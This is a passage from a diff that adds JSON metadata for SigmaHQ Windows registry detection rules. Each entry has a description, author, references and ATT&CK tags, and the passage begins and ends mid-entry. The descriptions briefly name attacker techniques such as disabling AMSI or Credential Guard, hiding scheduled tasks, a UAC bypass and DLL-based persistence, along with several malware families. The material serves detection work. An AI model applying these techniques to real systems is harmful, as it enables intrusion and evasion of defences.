"33efc23c-6ea2-4503-8cfe-bdf82ce8f705", + "value": "Persistence Via New AMSI Providers" + }, + { + "description": "Detects creation of UserInitMprLogonScript persistence method", + "meta": { + "author": "Tom Ueltschi (@c_APT_ure)", + "creation_date": "2019/01/12", + "falsepositive": [ + "Exclude legitimate logon scripts" + ], + "filename": "registry_add_logon_scripts_userinitmprlogonscript_reg.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1037/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.001/T1037.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_logon_scripts_userinitmprlogonscript_reg.yml" + ], + "tags": [ + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" + ] + }, + "uuid": "9ace0707-b560-49b8-b6ca-5148b42f39fb", + "value": "Logon Scripts Creation in UserInitMprLogonScript Registry" + }, + { + "description": "Attempts to detect registry events for common NetWire key HKCU\\Software\\NetWire", + "meta": { + "author": "Christopher Peacock", + "creation_date": "2021/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_add_mal_netwire.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", + "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", + "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", + "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "1d218616-71b0-4c40-855b-9dbe75510f7f", + "value": "NetWire RAT Registry Key" + }, + { + "description": "Detects new registry key created by Ursnif malware.", + "meta": { + "author": "megan201296", + "creation_date": "2019/02/13", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_add_mal_ursnif.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112" + ] + }, + "uuid": "21f17060-b282-4249-ade0-589ea3591558", + "value": "Ursnif" + }, + { + "description": "Detects COM object hijacking via TreatAs subkey", + "meta": { + "author": "Kutepov Anton, oscd.community", + "creation_date": "2019/10/23", + "falsepositive": [ + "Maybe some system utilities in rare cases use linking keys for backward compatibility" + ], + "filename": "registry_add_persistence_key_linking.yml", + "level": "medium", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_key_linking.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "9b0f8a61-91b2-464f-aceb-0527e0a45020", + "value": "Windows Registry Persistence COM Key Linking" + }, + { + "description": "Detects the of the \"accepteula\" key related to sysinternals tools being created from non sysinternals tools", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_add_renamed_sysinternals_eula_accepted.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "f50f3c09-557d-492d-81db-9064a8d4e211", + "value": "Usage of Renamed Sysinternals Tools" + }, + { + "description": "Detects the usage of Suspicious Sysinternals Tools such as PsExec, Procdump...etc via the \"accepteula\" key being added to Registry", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/24", + "falsepositive": [ + "Legitimate use of SysInternals tools" + ], + "filename": "registry_add_susp_sysinternals_eula_accepted.yml", + "level": "medium", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "c7da8edc-49ae-45a2-9e61-9fd860e4e73d", + "value": "Usage of Suspicious Sysinternals Tools" + }, + { + "description": "Detects the usage of Sysinternals Tools due to accepteula key being added to Registry", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/08/28", + "falsepositive": [ + "Legitimate use of SysInternals tools", + "Programs that use the same Registry Key" + ], + "filename": "registry_add_sysinternals_eula_accepted.yml", + "level": "low", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Moti_B/status/1008587936735035392", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "25ffa65d-76d8-4da5-a832-3f2b0136e133", + "value": "Usage of Sysinternals Tools - Registry" + }, + { + "description": "A General detection to trigger for the creation or modification of .*\\Software\\Sysinternals\\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_add_sysinternals_sdelete_registry_keys.yml", + "level": "medium", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/9", + "https://threathunterplaybook.com/evals/apt29/detections/4.B.2_59A9AC92-124D-4C4B-A6BF-3121C98677C3.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_sysinternals_sdelete_registry_keys.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.004" + ] + }, + "uuid": "9841b233-8df8-4ad7-9133-b0b4402a9014", + "value": "Sysinternals SDelete Registry Keys" + }, + { + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.\nThe disk cleanup manager is part of the operating system. It displays the dialog box […]\nThe user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate new entry added by windows" + ], + "filename": "registry_set_disk_cleanup_handler_new_entry_persistence.yml", + "level": "medium", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/diskcleanuphandler.html", + "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_set_disk_cleanup_handler_new_entry_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "d4f4e0be-cf12-439f-9e25-4e2cdcf7df5a", + "value": "Persistence Via Disk Cleanup Handler - NewEntry" + }, + { + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. Which could indicate an attacker trying to launch an encryption process", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Legitimate administrators removing applications (should always be monitored)" + ], + "filename": "registry_delete_exploit_guard_protected_folders.yml", + "level": "high", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", + "value": "Removal Of Folder From ProtectedFolders In Exploit Guard" + }, + { + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/10/19", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_delete_mstsc_history_cleared.yml", + "level": "high", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", + "http://woshub.com/how-to-clear-rdp-connections-history/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1112" + ] + }, + "uuid": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "value": "Terminal Server Client Connection History Cleared" + }, + { + "description": "Remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection", + "meta": { + "author": "frack113", + "creation_date": "2021/06/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "registry_delete_removal_amsi_registry_key.yml", + "level": "high", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://seclists.org/fulldisclosure/2020/Mar/45", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "41d1058a-aea7-4952-9293-29eaaf516465", + "value": "Removal Of Amsi Provider Reg Key" + }, + { + "description": "A General detection to trigger for processes removing .*\\shell\\open\\command registry keys. Registry keys that might have been used for COM hijacking activities.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" + ], + "filename": "registry_delete_removal_com_hijacking_registry_key.yml", + "level": "medium", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/7", + "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", + "https://docs.microsoft.com/en-us/windows/win32/shell/launch", + "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", + "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "96f697b0-b499-4e5d-9908-a67bec11cdb6", + "value": "Removal of Potential COM Hijacking Registry Keys" + }, + { + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_delete_removal_index_value_scheduled_task_hide.yml", + "level": "medium", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", + "value": "Removal Of Index Value to Hide Schedule Task" + }, + { + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", + "meta": { + "author": "Sittikorn S", + "creation_date": "2022/04/15", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_delete_removal_sd_value_scheduled_task_hide.yml", + "level": "medium", + "logsource.category": "registry_delete", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", + "value": "Removal Of SD Value to Hide Schedule Task" + }, + { + "description": "Sysmon registry detection of a local hidden user account.", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/05/03", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_add_local_hidden_user.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1387530414185664538", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001" + ] + }, + "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "value": "Creation of a Local Hidden User Account by Registry" + }, + { + "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", + "meta": { + "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2018/03/23", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_apt_chafer_mar18.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml" + ], + "tags": [ + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" + ] + }, + "uuid": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "value": "Chafer Activity - Registry" + }, + { + "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", + "meta": { + "author": "Aidan Bracher", + "creation_date": "2020/07/07", + "falsepositive": "No established falsepositives", + "filename": "registry_event_apt_leviathan.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_leviathan.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "70d43542-cd2d-483c-8f30-f16b436fd7db", + "value": "Leviathan Registry Key Activity" + }, + { + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "meta": { + "author": "megan201296, Jonhnathan Ribeiro", + "creation_date": "2019/04/14", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_apt_oceanlotus_registry.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://github.com/eset/malware-ioc/tree/master/oceanlotus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", + "value": "OceanLotus Registry Activity" + }, + { + "description": "Detects Pandemic Windows Implant", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/06/01", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_apt_pandemic.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://wikileaks.org/vault7/#Pandemic", + "https://twitter.com/MalwareJake/status/870349480356454401", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1105" + ] + }, + "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "value": "Pandemic Registry Key" + }, + { + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "meta": { + "author": "oscd.community, Dmitry Uchakin", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_bypass_via_wsreset.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "value": "UAC Bypass Via Wsreset" + }, + { + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "meta": { + "author": "Nik Seetharaman", + "creation_date": "2018/07/16", + "falsepositive": [ + "Legitimate CMSTP use (unlikely in modern enterprise environments)" + ], + "filename": "registry_event_cmstp_execution_by_registry.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" + ] + }, + "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", + "value": "CMSTP Execution Registry Event" + }, + { + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1182516740955226112", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ] + }, + "uuid": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "value": "Disable Security Events Logging Adding Reg Key MiniNt" + }, + { + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2019/08/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_disable_wdigest_credential_guard.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://teamhydra.blog/2020/08/25/bypassing-credential-guard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "value": "Wdigest CredGuard Registry Modification" + }, + { + "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", + "value": "Esentutl Volume Shadow Copy Service Keys" + }, + { + "description": "Detects the use of Windows Credential Editor (WCE)", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/12/31", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_hack_wce_reg.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.ampliasecurity.com/research/windows-credentials-editor/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" + ] + }, + "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "value": "Windows Credential Editor Registry" + }, + { + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/04/12", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1608" + ] + }, + "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", + "value": "HybridConnectionManager Service Installation - Registry" + }, + { + "description": "Detects the presence of a registry key created during Azorult execution", + "meta": { + "author": "Trent Liffick", + "creation_date": "2020/05/08", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_mal_azorult.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml" + ], + "tags": [ + "attack.execution", + "attack.t1112" + ] + }, + "uuid": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "value": "Registry Entries For Azorult Malware" + }, + { + "description": "Detects FlowCloud malware from threat group TA410.", + "meta": { + "author": "NVISO", + "creation_date": "2020/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_mal_flowcloud.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_flowcloud.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ] + }, + "uuid": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "value": "FlowCloud Malware" + }, + { + "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", + "meta": { + "author": "Markus Neis, @markus_neis, Florian Roth", + "creation_date": "2021/07/04", + "falsepositive": [ + "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + ], + "filename": "registry_event_mimikatz_printernightmare.yml", + "level": "critical", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", + "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204", + "cve.2021.1675", + "cve.2021.34527" + ] + }, + "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "value": "PrinterNightmare Mimimkatz Driver Name" + }, + { + "description": "Detects value modification of registry key containing path to binary used as screensaver.", + "meta": { + "author": "Bartlomiej Czyz @bczyz1, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate modification of screensaver" + ], + "filename": "registry_event_modify_screensaver_binary_path.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", + "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.002" + ] + }, + "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", + "value": "Path To Screensaver Binary Modified" + }, + { + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "meta": { + "author": "Dmitriy Lifanov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_narrator_feedback_persistance.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "value": "Narrator's Feedback-Hub Persistence" + }, + { + "description": "Detects NetNTLM downgrade attack", + "meta": { + "author": "Florian Roth, wagga", + "creation_date": "2018/03/20", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_net_ntlm_downgrade.yml", + "level": "high", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ] + }, + "uuid": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "value": "NetNTLM Downgrade Attack - Registry" + }, + { + "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", + "meta": { + "author": "Ilyas Ochkov, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", + "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.009" + ] + }, + "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "value": "New DLL Added to AppCertDlls Registry Key" + }, + { + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", + "meta": { + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "creation_date": "2019/10/25", + "falsepositive": [ + "Unknown" + ], + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml", + "level": "medium", + "logsource.category": "registry_event", + "logsource.product": "windows", + "refs": [ + "https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.010" + ] + }, + "uuid": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "value": "New DLL Added to AppInit_DLLs Registry Key" + }, + { + "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", + "meta": { + "author": "omkar72", + "creation_date": "2020/10/25", + "falsepositive": [ + "Unlikely" + ], + "filename": 